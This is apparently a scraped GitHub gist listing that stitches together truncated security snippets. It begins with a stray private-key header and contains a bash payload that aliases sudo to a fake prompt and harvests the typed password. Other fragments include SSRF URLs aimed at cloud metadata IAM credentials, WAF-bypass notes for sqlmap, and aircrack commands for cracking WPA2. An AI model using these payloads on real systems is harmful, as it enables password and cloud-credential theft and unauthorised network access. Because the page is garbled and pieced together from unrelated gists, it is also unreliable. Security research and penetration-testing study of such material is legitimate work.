-----BEGIN RSA PRIVATE KEY-----
# Create payload: replace sudo with an alias
payload='
fake_sudo() {
# Simulate a sudo prompt
echo -n "[sudo] password for ${USER}: "
read -s password
echo
# Run your command so you are happy
echo "$password" | sudo -S "$@"
# Do my evil stuff with your password
@duraki
duraki / script.sh
Created April 16, 2020 08:36
The first two statements of your BASH script should be…
#!/usr/bin/env bash
set -euo pipefail
duraki / cloud_metadata.txt
Created January 7, 2020 22:09 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
duraki / sqlmap-tamper-scripts-evaluation.md
Created July 4, 2019 12:59 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF


The table below presents the results of tests launched against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.

The names below are to be passed to the --tamper= parameter of sqlmap.

The Violation Rating column represents the most dominant rating among the topmost 20 requests observed by F5 in its Security>>Event Logs:Application:Requests view.

The scale is 0-5.

Go the road less travelled, find programs that are not on hackerone or bugcrowd:
https://www.bugcrowd.com/bug-bounty-list/
google: "Responsible Disclosure" or "Vulnerability Disclosure" or "responsible disclosure website list"
google: responsible disclosure "bounty"
Responsible Disclosure seems to give best results.
intext:"Responsible Disclosure Policy"
"responsible disclosure" "private program"
"responsible disclosure" "private" "program"
Google Dork:
duraki / Aircrack Commands
Created March 22, 2019 10:24 — forked from victorreyesh/Aircrack Commands
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s
sudo airport en1 sniff [CHANNEL]
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
duraki / fix_macbook_air_redhat_linux_wifi.txt
Last active May 7, 2022 13:04
Wi-fi fix RHEL on Macbook Air
# => unload/load wl module
$ modprobe -r wl
$ modprobe wl
$ nmtui ...
# => show use across the linux
$ modprobe --show-depends wl
insmod /lib/modules/3.10.0-693.11.1.el7.x86_64/kernel/net/rfkill/rfkill.ko.xz
insmod /lib/modules/3.10.0-693.11.1.el7.x86_64/kernel/net/wireless/cfg80211.ko.xz
duraki / web-servers.md
Created February 5, 2018 17:46 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000